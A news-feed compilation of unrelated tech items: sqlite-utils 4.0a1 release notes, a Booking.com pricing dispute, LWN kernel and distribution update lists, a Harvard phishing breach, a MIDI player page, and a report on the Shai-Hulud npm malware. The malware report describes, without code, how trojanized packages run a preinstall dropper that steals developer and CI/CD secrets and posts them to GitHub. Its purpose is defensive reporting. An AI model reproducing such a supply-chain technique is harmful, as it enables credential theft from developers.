sqlite-utils is two things in one package: a Python library for conveniently creating and manipulating SQLite databases and a CLI tool for working with them in the terminal. Almost every feature provided by the package is available via both of those surfaces.

This is hopefully the last alpha before a 4.0 stable release. I use semantic versioning for this library, so the 4.0 version number indicates that there are backward incompatible changes that may affect code written against the 3.x line.

These changes are mostly very minor: I don’t want to break any existing code if I can avoid it. I made it all the way to version 3.38 before I had to ship a major release and I’m sad I couldn’t push that even further!

Here are the annotated release notes for 4.0a1.

  • Breaking change: The db.table(table_name) method now only works with tables. To access a SQL view use db.view(view_name) instead. ( #657 )

This change is for type hint enthusiasts. The Python library used to encourage accessing both SQL tables and SQL views through the db["name_of_table_or_view"] syntactic sugar—but tables and views have different interfaces, since there’s no way to handle a .insert(row) on a SQLite view. If you want clean type hints for your code you can now use the db.table(table_name) and db.view(view_name) methods instead.
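
A quick sketch of what the split looks like in practice, based on the two methods named above (the table and view names are made up):

import sqlite_utils

db = sqlite_utils.Database(memory=True)

# Tables get the full table interface, including inserts:
articles = db.table("articles")
articles.insert({"id": 1, "title": "Hello"}, pk="id")

# Views are read-only, so db.view() exposes the narrower view interface:
db.execute("create view article_titles as select title from articles")
titles = db.view("article_titles")
print(list(titles.rows))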

  • The table.insert_all() and table.upsert_all() methods can now accept an iterator of lists or tuples as an alternative to dictionaries. The first item should be a list/tuple of column names. See Inserting data from a list or tuple iterator for details. ( #672 )

A new feature, not a breaking change. I realized that supporting a stream of lists or tuples as an option for populating large tables would be a neat optimization over always dealing with dictionaries each of which duplicated the column names.

I had the idea for this one while walking the dog and built the first prototype by prompting Claude Code for web on my phone. Here’s the prompt I used and the prototype report it created, which included a benchmark estimating how much of a performance boost could be had for different sizes of tables.
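
Going by the description above, usage looks something like this (table and column names are made up; see the linked documentation for the exact details):

import sqlite_utils

db = sqlite_utils.Database(memory=True)

rows = [
    ("id", "name", "score"),   # first item: the column names
    (1, "Cleo", 51.5),         # remaining items: rows of values in the same order
    (2, "Pancakes", 47.0),
]
db["dogs"].insert_all(rows, pk="id")
print(db["dogs"].schema)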

  • Breaking change: The default floating point column type has been changed from FLOAT to REAL, which is the correct SQLite type for floating point values. This affects auto-detected columns when inserting data. ( #645 )

I was horrified to discover a while ago that I’d been creating SQLite columns called FLOAT but the correct type to use was REAL! This change fixes that. Previously the fix was to ask for tables to be created in strict mode.

  • Now uses pyproject.toml in place of setup.py for packaging. ( #675 )

As part of this I also figured out recipes for using uv as a development environment for the package, which are now baked into the Justfile .

  • Tables in the Python API now do a much better job of remembering the primary key and other schema details from when they were first created. ( #655 )

This one is best explained in the issue .

  • Breaking change: The table.convert() and sqlite-utils convert mechanisms no longer skip values that evaluate to False. Previously the --skip-false option was needed; this has been removed. ( #542 )

Another change which I would have made earlier but, since it introduces a minor behavior change to an existing feature, I reserved it for the 4.0 release.

  • Breaking change: Tables created by this library now wrap table and column names in "double-quotes" in the schema. Previously they would use [square-braces]. ( #677 )

Back in 2018 when I started this project I was new to working in-depth with SQLite and incorrectly concluded that the correct way to create tables and columns named after reserved words was like this:

create table [my table] (
  [id] integer primary key,
  [key] text
)

That turned out to be a non-standard SQL syntax which the SQLite documentation describes like this :

A keyword enclosed in square brackets is an identifier. This is not standard SQL. This quoting mechanism is used by MS Access and SQL Server and is included in SQLite for compatibility.

Unfortunately I baked it into the library early on and it’s been polluting the world with weirdly escaped table and column names ever since!

I’ve finally fixed that, with the help of Claude Code which took on the mind-numbing task of updating hundreds of existing tests that asserted against the generated schemas.

The above example table schema now looks like this:

create table "my table" (
  "id" integer primary key,
  "key" text
)

This may seem like a pretty small change but I expect it to cause a fair amount of downstream pain purely in terms of updating tests that work against tables created by sqlite-utils !

  • The --functions CLI argument now accepts a path to a Python file in addition to accepting a string full of Python code. It can also now be specified multiple times. ( #659 )

I made this change first in LLM and decided to bring it to sqlite-utils for consistency between the two tools.

  • Breaking change: Type detection is now the default behavior for the insert and upsert CLI commands when importing CSV or TSV data. Previously all columns were treated as TEXT unless the --detect-types flag was passed. Use the new --no-detect-types flag to restore the old behavior. The SQLITE_UTILS_DETECT_TYPES environment variable has been removed. ( #679 )

One last minor ugliness that I waited for a major version bump to fix.
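
In practice that means a plain CSV import now detects types, and the old all-TEXT behaviour needs the new flag (the file and table names here are made up):

# Types are now detected by default when importing CSV:
sqlite-utils insert data.db records data.csv --csv

# Restore the previous all-TEXT behaviour:
sqlite-utils insert data.db records data.csv --csv --no-detect-types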

Booking.com cancels $4K hotel reservation, offers same rooms again for $17K

Hacker News
www.cbc.ca
2025-11-24 14:43:01
Comments...
Original Article

When Erika Mann booked a hotel for the 2026 Formula One Grand Prix in Montreal, she played it safe.

Her relatives were flying in from the Netherlands to watch the races with her, and Mann, who lives in Oakville, Ont., wanted to make sure their accommodations were locked in.

On May 25, she booked a four-room unit on Booking.com at Montreal's Holland Hotel, steps from the heart of race-weekend action. Price tag: $4,300. "I was super excited and yeah, jumped right on it," Mann told Go Public.

But weeks after her reservation was confirmed, her excitement ended. Mann says both the hotel and Booking.com told her the price was a mistake — and if she still wanted the unit for May 22-24, 2026, she'd need to cough up four times the amount — more than $17,000.

"That was just so outstandingly outrageous that I almost couldn't believe it," she told Go Public.

Digital rights expert David Fewer says shocks like this are becoming more common as online travel sites and hotels rely on automated booking and pricing systems.

He says Booking.com's policies allow confirmed reservations to be cancelled if the company decides the original rate was an error, leaving consumers exposed — especially when prices surge during big events, a practice known as event pricing.

"She'd done the research, she'd found the deal … and she'd booked it and thought she was done, and she was not," said Fewer, who directs the Samuelson-Glushko Canadian Internet Policy and Public Interest Clinic (CIPPIC) at the University of Ottawa.

"It's a weak position … our consumer protection laws are not great."

'Everything about this felt off'

When Mann booked the accommodations, Formula One organizers hadn't locked in the exact race dates. So she covered her bases — reserving the same four-bedroom unit for two possible weekends in May 2026, both with free cancellation.

Once the official dates were announced, she cancelled the extra booking, in line with Booking.com rules.

Mann says she first heard there was a problem weeks later on June 27, when the hotel called her saying the price was wrong and she needed to cancel or pay the new rate.

She contacted Booking.com, which gave her two choices: Cancel the reservation herself or pay that new sky-high rate for the same unit on the same dates.

When she refused and demanded to keep her original booking, the website cancelled it.

At this point, Mann says flights were already booked, and accommodation prices in Montreal were rising quickly.

"It felt like they were running out the clock," she said.

Despite her efforts, nothing changed.

"It felt like Groundhog Day, to be honest,” she said. “Every time it was the same thing. You call in, you're on an immense hold, you talk to someone, you tell the whole story over again.”

The Holland Hotel by Simplissimmo is at the heart of Montreal, close to tourist hot spots and the Formula One Grand Prix events. (Charles Contant/CBC)

Hotel blames pricing glitch

The Holland Hotel, where Mann had booked, told Go Public a "synchronization error" with Booking.com caused the issue, allowing non-event pricing to briefly appear for two units at the property. When that pricing appeared, the hotel says, Mann booked one of the units.

It said automated software updates prices through Booking.com's system — which means the hotel can't manually override the rates shown on the platform.

The hotel says that when Formula One organizers confirmed in 2024 that the 2026 Montreal Grand Prix would take place on the third or fourth weekend of May, the system should have automatically adjusted those dates to “event pricing.”

Mercedes driver George Russell, of the United Kingdom, drives during Formula One auto racing action at the Canadian Grand Prix in Montreal on June 15. (Christopher Katsarov/The Canadian Press)

Booking.com says the hotel asked them to review the case. The site sided with the property after it reported the posted rate was an error.

Mann says Booking.com did offer alternative accommodations for roughly what she paid — but none were remotely equivalent and would have meant squeezing her in with her adult step brother, step sister and partner, plus her 24-year-old son and husband.

"One was a single-room studio with two beds," she said. "Another had one bathroom. We're a group of adults, not backpackers."

Fine-print pitfall

Booking.com's terms note that "Obvious errors and obvious misprints are not binding. For example, if you book a premium car or a night in a luxury suite mistakenly offered for $1, your booking may be cancelled, and we'll refund anything you've paid."

The hotel told Go Public it was this Booking.com rule that allowed Mann's reservation to be cancelled, and noted that "nothing about this case is unusual."

It says rates are always higher during the Grand Prix, and the increased prices were a "consistent and a well-known market reality" during the event.

Digital law expert David Fewer says booking platforms offer few protections to users and consumer protection laws are lacking. (Naomi Fewer)

Fewer isn't convinced.

"It's not like they missed the decimal point, right? They gave you the hotel for a buck instead of a thousand bucks. This is something else,” Fewer said. “This is where I think consumers should get the benefit.”

He says the bigger problem is that travellers are often left to fend for themselves, noting that many booking platforms have policies that don’t protect customers, and consumer protection laws haven't caught up.

"What we need is a consumer protection statute," he said. "Especially for these kinds of things like surge pricing or after-the-fact event pricing … consumers get the benefit of the deal that they found."

Booking.com takes action — after Go Public inquires

After Go Public contacted Booking.com, the company took another look at Mann's case.

In a written statement, it said the hotel requested the cancellation.

WATCH | Booking.com cancels $4K reservation, offers to rebook for $17K | Go Public

"Our procedures do allow for cancellations in limited circumstances where a genuine rate mistake has occurred," Booking.com wrote to Go Public. "That being said, we recognize that communication to the customer fell short of our usual standards."

The company says the cancellation was approved under its standard policy permitting properties to void bookings in "rare cases where a property identifies a clear rate error."

Following Go Public's questions, Booking.com told Mann it would honour her original booking and cover the price difference — allowing her to keep the same four bedroom unit at no additional cost.

Mann says she's relieved, but adds that getting help shouldn't require contacting the media.

"You're basically left holding an empty bag and have no power."

How Canadians can protect themselves

Fewer says travellers booking accommodations during major events should take the following steps to protect themselves:

  • Take screenshots during the booking, including numbers and prices.
  • Call hotels directly to confirm the reservation rate.
  • Use credit cards with strong dispute policies.

"You need to protect yourself the way you would with any contract," he said.

Mann says she did everything right — booked early and documented everything — and still ended up fighting for almost two months to get what she paid for.

"I've used Booking.com for so many other trips and travels, but to me, when this sort of thing happens," she said, "You lose faith.


Shai-Hulud malware infects 500 npm packages, leaks secrets on GitHub

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 14:32:40
Hundreds of trojanized versions of well-known packages such as Zapier, ENS Domains, PostHog, and Postman have been planted in the npm registry in a new Shai-Hulud supply-chain campaign. [...]...
Original Article


Hundreds of trojanized versions of well-known packages such as Zapier, ENS Domains, PostHog, and Postman have been planted in the npm registry in a new Shai-Hulud supply-chain campaign.

The malicious packages have been added to NPM (Node Package Manager) over the weekend to steal developer and continuous integration and continuous delivery (CI/CD) secrets. The data is automatically posted on GitHub in encoded form.

At publishing time, GitHub returned 27,600 results corresponding to entries related to the recent attack.


GitHub repositories with secrets stolen in the new Shai-Hulud campaign (source: BleepingComputer)

When the Shai-Hulud malware first appeared in the npm space in mid-September, it compromised 187 packages with a self-propagating payload that used the TruffleHog tool to steal developer secrets.

The threat actor automatically downloaded legitimate packages, modified the package.json file to inject a malicious script, and then published them on npm using compromised maintainer accounts.

When Charlie Eriksen, malware researcher at developer-focused security platform Aikido Security, discovered the new campaign earlier today, there were 105 trojanized packages with Shai-Hulud indicators. Since then, the number has grown to 492, some of them with multiple versions.

Later, the researcher warned that the secrets stolen in the supply-chain attack were leaked on GitHub.

However, the campaign has grown exponentially to more than 27,000 malicious packages. Threat researchers at cloud security platform Wiz discovered around 350 unique maintainer accounts used in the campaign, noting that "1,000 new repositories are being added consistently every 30 minutes in the last couple of hours."

Eriksen clarified for BleepingComputer that the repositories on GitHub are indicative of compromised developers who used trojanized npm packages and had GitHub credentials in their environment.

A technical analysis of the new Shai-Hulud malware from CI/CD security company Step Security explains that the new payload is present in two files, one being setup_bun.js - a dropper disguised as a Bun installer.

The second file is called bun_environment.js and is sizeable at 10MB. It relies on "extreme obfuscation techniques," Step Security says, such as a large hex-encoded string with thousands of entries, an anti-analysis loop, and an obfuscated function to retrieve every string in the code.

According to Wiz, the malicious code collects developer and CI/CD secrets and publishes them to GitHub repositories "with names referencing Shai-Hulud." The malicious code executes only during the pre-install stage and creates the following files:

  • cloud.json
  • contents.json
  • environment.json
  • truffleSecrets.json

Stolen secrets are published on GitHub to automatically-generated repositories that have the description "Sha1-Hulud: The Second Coming."

It appears that the threat actor has also gained access to GitHub accounts that they are now using to create repositories with the four files above.

GitHub accounts hosting repos from the Shai-Hulud campaign (source: BleepingComputer)

GitHub is deleting the attacker’s repositories as they emerge, but the threat actor appears to be creating new ones very fast.

On the list of 186 packages that Aikido Security found to be compromised with a new version of the Shai Hulud malware, there are multiple packages from Zapier, ENS Domains, PostHog, and AsyncAPI.

The compromised Zapier packages constitute the official toolkit for building Zapier integrations and are essential for Zapier developers.

The EnsDomains packages are tools and libraries widely used by wallets, DApps, exchanges, and the ENS Manager app, to handle .eth names, resolving them to Ethereum addresses, linking IPFS content, validating names, and interacting with the official ENS smart contracts.

All of the compromised packages are available for download from npm. However, in some cases, the platform displays a warning message about unauthorized publication of the latest version, indicating that the automated review has caught signs of a compromise.

Warning message on npm (source: BleepingComputer)

Developers are advised to check Aikido’s post for the complete list of the infected packages, downgrade to safe versions, and rotate their secrets and CI/CD tokens immediately.

Wiz researchers recommend that security teams first identify the compromised packages and replace them with legitimate ones. They also urge organizations to rotate all credentials tied to npm, GitHub, and cloud providers.

Aikido Security advises developers to disable npm postinstall scripts during continuous integration, if possible.
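
As a sketch of one way to do that (assuming npm is the package manager in use), lifecycle scripts can be disabled in configuration or per install:

# .npmrc - skip lifecycle scripts such as preinstall/postinstall, where this payload runs
ignore-scripts=true

# or as a one-off in a CI step
npm ci --ignore-scripts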

The return of Shai-Hulud comes as GitHub has introduced additional security measures to prevent supply-chain attacks on npm, following a series of high-impact attacks on the platform. However, the measures are being implemented gradually.


Sorry Chi, Hello Julia?

hellgate
hellgatenyc.com
2025-11-24 14:14:59
And more stories to kick off your holiday week....
Original Article
Councilmember Chi Ossé wields a bullhorn in support of his bill banning forced broker fees (Emil Cohen / NYC Council Media Unit)

Morning Spew

Scott's Picks:


Three stable kernel updates, two french hens, ...

Linux Weekly News
lwn.net
2025-11-24 14:11:01
Greg Kroah-Hartman has announced the release of the 6.17.9, 6.12.59, and 6.6.117 stable kernels. As usual, he advises users of stable kernels to upgrade. ...
Original Article

[Posted November 24, 2025 by daroc]

Greg Kroah-Hartman has announced the release of the 6.17.9, 6.12.59, and 6.6.117 stable kernels. As usual, he advises users of stable kernels to upgrade.



Harvard University discloses data breach affecting alumni, donors

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 14:06:36
Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members. [...]...
Original Article


Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members.

The exposed data includes email addresses, telephone numbers, home and business addresses, event attendance records, donation details, and "biographical information pertaining to University fundraising and alumni engagement activities."

However, according to Klara Jelinkova, Harvard's Vice President and University Chief Information Officer, and Jim Husson, the university's Vice President for Alumni Affairs and Development, the compromised IT systems didn't contain Social Security numbers, passwords, payment card information, or financial info.


Harvard officials believe that the following groups and individuals had their data exposed in the data breach:

  • Alumni
  • Alumni spouses, partners, and widows/widowers of alumni
  • Donors to Harvard University
  • Parents of current and former students
  • Some current students
  • Some faculty and staff

The private Ivy League research university is working with law enforcement and third-party cybersecurity experts to investigate the incident, and it has sent data breach notifications on November 22nd to individuals whose information may have been accessed in the attack.

"On Tuesday, November 18, 2025, Harvard University discovered that information systems used by Alumni Affairs and Development were accessed by an unauthorized party as a result of a phone-based phishing attack," the letters warn .

"The University acted immediately to remove the attacker's access to our systems and prevent further unauthorized access. We are writing to make you aware that information about you may have been accessed and so you can be alert for any unusual communications that purport to come from the University."

The university also urged potentially affected individuals to be suspicious of calls, text messages, or emails claiming to be from the university, particularly those requesting password resets or sensitive information (e.g., passwords, Social Security numbers, or bank information).

A Harvard spokesperson was not immediately available for comment when contacted by BleepingComputer earlier today.

In mid-October, Harvard University also told BleepingComputer that it was investigating another data breach after the Clop ransomware gang added it to its data-leak extortion site, claiming it had breached the school's systems using a zero-day vulnerability in Oracle's E-Business Suite servers.

Two other Ivy League schools, Princeton University and the University of Pennsylvania, disclosed data breaches earlier this month, both confirming that attackers gained access to donors' information.


Security updates for Monday

Linux Weekly News
lwn.net
2025-11-24 14:05:35
Security updates have been issued by Fedora (calibre, chromium, cri-o1.32, cri-o1.33, cri-o1.34, dotnet10.0, dovecot, gnutls, gopass, gopass-hibp, gopass-jsonapi, kubernetes1.31, kubernetes1.32, kubernetes1.33, kubernetes1.34, and linux-firmware), Mageia (ffmpeg, kernel, kmod-xtables-addons & km...
Original Article
Dist. ID Release Package Date
Fedora FEDORA-2025-355be35bb1 F43 calibre 2025-11-24
Fedora FEDORA-2025-d41f5f4a2a F43 chromium 2025-11-24
Fedora FEDORA-2025-8c88aa0c74 F41 cri-o1.32 2025-11-22
Fedora FEDORA-2025-91677b56d4 F42 cri-o1.32 2025-11-22
Fedora FEDORA-2025-a246780676 F43 cri-o1.32 2025-11-22
Fedora FEDORA-2025-b339c2eaad F43 cri-o1.33 2025-11-22
Fedora FEDORA-2025-8bd0d993db F41 cri-o1.34 2025-11-22
Fedora FEDORA-2025-1e7710541e F42 cri-o1.34 2025-11-22
Fedora FEDORA-2025-723e0fd8bd F43 cri-o1.34 2025-11-22
Fedora FEDORA-2025-969f0c8c1e F41 dotnet10.0 2025-11-22
Fedora FEDORA-2025-aaa5764dc9 F42 dotnet10.0 2025-11-22
Fedora FEDORA-2025-41518fc0fd F43 dotnet10.0 2025-11-22
Fedora FEDORA-2025-e491c93405 F43 dovecot 2025-11-22
Fedora FEDORA-2025-45b1844342 F43 gnutls 2025-11-23
Fedora FEDORA-2025-817b0dc707 F43 gopass 2025-11-22
Fedora FEDORA-2025-b3bd444d1f F41 gopass-hibp 2025-11-22
Fedora FEDORA-2025-d4a04dda81 F43 gopass-jsonapi 2025-11-22
Fedora FEDORA-2025-d9389fc692 F41 kubernetes1.31 2025-11-22
Fedora FEDORA-2025-4a1370ea1b F42 kubernetes1.31 2025-11-22
Fedora FEDORA-2025-5a4555eabc F43 kubernetes1.31 2025-11-22
Fedora FEDORA-2025-547f14aef4 F41 kubernetes1.32 2025-11-23
Fedora FEDORA-2025-0131063534 F42 kubernetes1.32 2025-11-22
Fedora FEDORA-2025-00368e9022 F43 kubernetes1.32 2025-11-22
Fedora FEDORA-2025-298add9246 F43 kubernetes1.33 2025-11-24
Fedora FEDORA-2025-f32b1debd8 F43 kubernetes1.34 2025-11-24
Fedora FEDORA-2025-ecd9a3485b F42 linux-firmware 2025-11-22
Fedora FEDORA-2025-0ef7552461 F43 linux-firmware 2025-11-22
Mageia MGASA-2025-0306 9 ffmpeg 2025-11-21
Mageia MGASA-2025-0309 9 kernel, kmod-xtables-addons & kmod-virtualbox 2025-11-22
Mageia MGASA-2025-0310 9 kernel-linus 2025-11-22
Mageia MGASA-2025-0308 9 konsole 2025-11-21
Mageia MGASA-2025-0307 9 redis 2025-11-21
Red Hat RHSA-2025:0039-01 EL6 bind and bind-dyndb-ldap 2025-11-24
Red Hat RHSA-2025:21926-01 EL9 kernel 2025-11-24
SUSE openSUSE-SU-2025:15752-1 TW act 2025-11-22
SUSE openSUSE-SU-2025-20073-1 oS16.0 alloy 2025-11-21
SUSE SUSE-SU-2025:4191-1 MP4.2 MP4.3 SLE15 oS15.6 amazon-ssm-agent 2025-11-24
SUSE openSUSE-SU-2025:15753-1 TW ansible-12 2025-11-22
SUSE openSUSE-SU-2025:15754-1 TW ansible-core 2025-11-22
SUSE openSUSE-SU-2025:15756-1 TW blender 2025-11-22
SUSE openSUSE-SU-2025:15755-1 TW blender 2025-11-22
SUSE openSUSE-SU-2025-20076-1 oS16.0 chromium 2025-11-21
SUSE SUSE-SU-2025:4158-1 SLE15 oS15.6 cups-filters 2025-11-21
SUSE SUSE-SU-2025:4180-1 SLE-m5.2 curl 2025-11-24
SUSE openSUSE-SU-2025:15757-1 TW curl 2025-11-22
SUSE SUSE-SU-2025:4092-1 MP4.3 SLE15 SLE-m5.3 SLE-m5.4 SLE-m5.5 oS15.4 oS15.6 elfutils 2025-11-24
SUSE openSUSE-SU-2025-20055-1 oS16.0 expat 2025-11-21
SUSE SUSE-SU-2025:4174-1 SLE12 firefox 2025-11-24
SUSE SUSE-SU-2025:4173-1 SLE15 SES7.1 oS15.6 firefox 2025-11-24
SUSE openSUSE-SU-2025-20065-1 oS16.0 firefox 2025-11-21
SUSE SUSE-SU-2025:4186-1 SLE-m5.2 glib2 2025-11-24
SUSE SUSE-SU-2025:4197-1 SLE12 grub2 2025-11-24
SUSE SUSE-SU-2025:4196-1 SLE15 oS15.6 grub2 2025-11-24
SUSE openSUSE-SU-2025:15749-1 TW grub2 2025-11-22
SUSE SUSE-SU-2025:4190-1 SLE15 SLE-m5.5 SES7.1 oS15.6 helm 2025-11-24
SUSE SUSE-SU-2025:4188-1 MP4.2 SLE15 SLE-m5.1 SLE-m5.2 SES7.1 oS15.3 kernel 2025-11-24
SUSE SUSE-SU-2025:4189-1 SLE12 kernel 2025-11-24
SUSE openSUSE-SU-2025:15751-1 TW libipa_hbac-devel 2025-11-22
SUSE openSUSE-SU-2025-20050-1 oS16.0 libxslt 2025-11-21
SUSE SUSE-SU-2025:4187-1 SLE15 SES7.1 oS15.6 nvidia-container-toolkit 2025-11-24
SUSE openSUSE-SU-2025-20059-1 oS16.0 ongres-scram 2025-11-21
SUSE openSUSE-SU-2025-20056-1 oS16.0 openexr 2025-11-21
SUSE SUSE-SU-2025:4156-1 SLE15 SLE-m5.2 SES7.1 oS15.3 podman 2025-11-21
SUSE SUSE-SU-2025:4157-1 SLE15 SLE-m5.3 SLE-m5.4 oS15.4 podman 2025-11-21
SUSE SUSE-SU-2025:4185-1 SLE15 SLE-m5.5 oS15.5 oS15.6 podman 2025-11-24
SUSE openSUSE-SU-2025-20068-1 oS16.0 poppler 2025-11-21
SUSE SUSE-SU-2025:4073-2 SLE15 runc 2025-11-24
SUSE openSUSE-SU-2025-20072-1 oS16.0 runc 2025-11-21
SUSE openSUSE-SU-2025-20048-1 oS16.0 samba 2025-11-21
SUSE SUSE-SU-2025:4181-1 MP4.3 SLE15 SLE-m5.3 SLE-m5.4 oS15.4 sssd 2025-11-24
SUSE SUSE-SU-2025:4183-1 SLE15 sssd 2025-11-24
SUSE SUSE-SU-2025:4182-1 SLE15 SLE-m5.5 oS15.5 sssd 2025-11-24
SUSE SUSE-SU-2025:4195-1 SLE15 oS15.6 thunderbird 2025-11-24
SUSE SUSE-SU-2025:4184-1 SLE12 tomcat 2025-11-24
SUSE SUSE-SU-2025:4159-1 SLE15 SES7.1 oS15.6 tomcat 2025-11-21
Ubuntu USN-7878-2 25.04 cups-filters 2025-11-24
Ubuntu USN-7879-1 24.04 25.04 linux, linux-aws, linux-gcp, linux-hwe-6.14, linux-oracle, linux-realtime 2025-11-21
Ubuntu USN-7880-1 24.04 linux-oem-6.14 2025-11-21
Ubuntu USN-7879-2 24.04 linux-realtime-6.14 2025-11-21

Show HN: Cynthia – Reliably play MIDI music files – MIT / Portable / Windows

Hacker News
www.blaizenterprises.com
2025-11-24 13:58:05
Comments...
Original Article

Reliably play midi music files from a folder or ".m3u" play list. Adjust playback speed, volume and output device on-the-fly during playback. A large playback progress bar makes jumping forward and backward in time a breeze with just a single click or tap. Supports ".mid", ".midi" and ".rmi" files in format 0 (single track) and format 1 (multi-track). Comes complete with 25 sample midis ready to play.

Cynthia playing through her sample midi music

Features

  • Dual play systems - Play Folder and Play List
  • Comes with 25 built-in sample midis on a virtual disk
  • Elapsed, Remaining and Total time readouts
  • Device Status, Device Count, Msgs/sec and Data Rate readouts
  • Native ".m3u" playlist support (copy, paste, open, save, build)
  • Drag and drop midi files to play/add to playlist
  • Play Modes: Once, Repeat One, Repeat All, All Once, Random
  • Standard Play Speed Range: 50% to 200% (0.5x to 2x)
  • Extended Play Speed Range: 10% to 1,000% (0.1x to 10x)
  • Intro Mode: Play first 2s, 5s, 10s or 30s of midi
  • Rewind/Fast Forward by: 1s, 2s, 5s, 10s or 30s
  • Play on Start option - playback commences on app start
  • Always on Midi option - maintain connection to midi device(s) for instant playback
  • Auto Fade In - eliminate loud or abrupt notes during rewind, fast forward or reposition operations
  • Playback Progress bar - click to reposition/jump backward or forward in time
  • Volume control with volume boost (up to 200%)
  • " Mixer" link - display Windows "Volume Mixer" app
  • Play ".mid", ".midi" and ".rmi" midi files in 0 and 1 formats
  • Scrolling lyrics viewer
  • Detailed midi information panel
  • Tracks Panel: Realtime track data indicators, display flat or shaded, with mute all, unmute all, and mute individual track options
  • Channels Panel: Realtime channel output volume indicators with peak level hold and variable hold time, display flat or shaded, unmute all, mute all, and mute individual channel options
  • Mixer: Adjust individual channel volume levels from 0% to 200%
  • Option: Number channels 0-15 or 1-16
  • Notes Panel: 128 realtime note usage indicators with variable hold time, 8-12 notes per line, labels as letters or numbers, display flat or shaded, unmute all, mute all, and mute individual note options
  • Option: Number notes 0-127 or 1-128
  • Piano Panel: View realtime piano keystrokes on a 128, 88, 76, 61, 54, 49 or 37 key keyboard
  • Piano Keystroke Illumination: Off, Flat, Shade Up, Shade Down, Subtle, Subtle 2, Leading Edge, and Leading Edge 2
  • Piano: Mark middle C key, C + F keys, or all white keys
  • Volume Bars: Realtime average volume and bass volume levels (left and right vertical)
  • Transpose option: Shift all notes up/down music scale
  • Use an Xbox Controller to control Cynthia's main functions: Playback speed, volume, song position, display panels, song file navigation, jump to start of song, toggle fullscreen mode, etc
  • Large list capacity for handling thousands of midi files
  • Switch between up to 10 midi playback devices
  • Supports playback through a single midi device, or multiple simultaneous midi devices
  • Multi-Device Options (per midi device): Time Shift - adjust playback timing to compensate for midi device lag from -500 ms to +500 ms, Device Volume - adjust output volume from 0% to 200%, Output Channels - select which midi channels to play through the device
  • Automatic Midi Device(s) Resync - detects OS changes in midi device ordering/names and corrects in realtime
  • Custom built midi playback engine for high playback stability
  • Automatic compact mode for display on small/low resolution screens
  • Simple and easy to use
  • Options Window - Easily change app color, font, and settings
  • Portable
  • Smart Source Code (Borland Delphi 3 and Lazarus 2)

Information

App Name: Cynthia
Version: 1.0.6062
Type: Desktop App (Standard Edition)
License: MIT
Status:
Release Date: 9th November 2025
Portable App: Yes
Code Foundation: 4th Generation (Gossamer for GUI)
Operating System(s): Windows All and Wine for Linux and Mac
SHA256 Checksum (for "cynthia.exe"): 8B9CAB404E174767144C13A32C7357FDF320EA6D632069E68AFC10F107F98F38

Downloads

Images

Cynthia playing through her sample midi music


Cynthia displaying her menu


Realtime display panels Visual (Tracks, Channels, and Notes), Piano and Bars visible


Cynthia in her traditional view - Navigation, Information and Settings panels visible


Easily adjust channel volumes on-the-fly with the integrated mixer - hover over/tap the Channels panel to show/edit


Cynthia in the "Deep Orange 2" color scheme (Options > Color) and "Swell" animated background scheme (Options > Background), with Compact mode on (Options > Settings > Compact)


Online Help

Running Cynthia for the first time

Several sample midis are built in.  When starting Cynthia for the first time, these sample midis are listed in the " Play Folder" panel, and playback is automatic.

At any point during playback, you may select another midi from the list.  Playback seamlessly switches to the selected midi in question.

Cynthia supports realtime changes to settings during playback.  This means you may adjust the Playback Mode, Playback Device, Volume and Speed without having to stop/restart playback.

Main toolbar links and their function

The main toolbar is located near the top of Cynthia's window.  From left to right, it has the following links:

Nav - Toggle display of navigation panel
Play Folder - Show the "Play Folder" panel to play midis from a folder
Play List - Show the "Play List" panel to play midis from a playlist
Prev - Play previous midi file in list
Rewind - Shift playback position back several seconds
Stop - Stop playback
Play - Toggle playback: When playing ( flashing) playback stops/when stopped ( static) playback starts
Fast Forward - Shift playback position forward several seconds
Next - Play next midi file in list
Menu - Show menu
Mixer - Show the Windows Mixer app
Options - Show the Options window, to change Cynthia's appearance
Help - Show (from rightmost column) or hide built-in help

How to play a list of midis in a folder

From the main toolbar click the " Play Folder" link (top left) to display the "Play Folder" panel.

With Play Folder, there is no need for a playlist or setup.  Just navigate to the folder in question and instantly play the midis within.

Double click the " Home" entry at top of list (scroll up if not visible).  The list will refresh with the names of your hard drives, pen sticks and other local storage devices.  Double click a drive, then the subsequent folder(s), until you reach the one that you want to play.

The list will update.  Double click a specific midi to begin playback, or, click the " Play" link.

Toolbar Links
Refresh - Refresh the playback list
Fav - Show the "Favourites" window.  Use this handy window to maintain a list of your favourite folders for quick access.
Back - Go to the previous folder in navigation history
Forward - Go to the next folder in navigation history

Tips :
There is no need to stop playback before switching to another folder.  Double click the new folder and wait several seconds for Cynthia to automatically recommence playback.

The current folder will be remembered when Cynthia is restarted.

How to use a playlist to play a selection of midis

The standard ".m3u" playlist format is supported.  This is a plain text file that contains the length of the midi in seconds, a title, and the location of each midi.
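
As a rough sketch, such a playlist might look like this (the titles, durations and paths are made up):

#EXTM3U
#EXTINF:95,Greensleeves
midis\greensleeves.mid
#EXTINF:184,Moonlight Sonata
C:\Music\Midi\moonlight_sonata.midi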

Cynthia supports midi playback from local storage devices, such as hard disks, pen sticks etc.  Internet urls are not supported.

If you already have a playlist in the m3u format saved on your disk, you can open it in Cynthia for playback.  From the main toolbar click the " Play List" link (top left) to show the Play List panel.  An additional toolbar presents.  Click the " Open" link (if shown) or " Edit > Open".  From the Open window, navigate to your playlist, select and click the "Open" button.

The contents of your playlist will load inside the Play List panel.  Click the " Play" link to begin playback.

How to make a playlist

There are several ways a playlist can be constructed.  The first method is the easiest.  From your computer explorer ("File Explorer" in Windows and "Files" in Ubuntu) navigate to the folder of midis.  Highlight one or more midi files inside the folder, drag the selection onto Cynthia, and let go of the mouse button.  The " Play List" panel updates and displays the dropped midi files appended to the list.  Repeat this process for as many midi files as required.

At anytime you may save the playlist.  From the Play List toolbar, click the " Save As" link (if shown) or " Edit > Save As...".  Type a name in the Save window and click the "Save" button to save the playlist.

It is worth noting that each time Cynthia saves your playlist to file, the midi files referenced inside it have their names adjusted automatically to work with the specific save location of the playlist.

Most midi filenames in a playlist are relative, as they do not have the full drive, folder and filename, but rather a partial folder structure and the midi's name.  This is to permit the movement of the midis and the playlist from one location to another without the need for the playlist to be specifically rewritten.

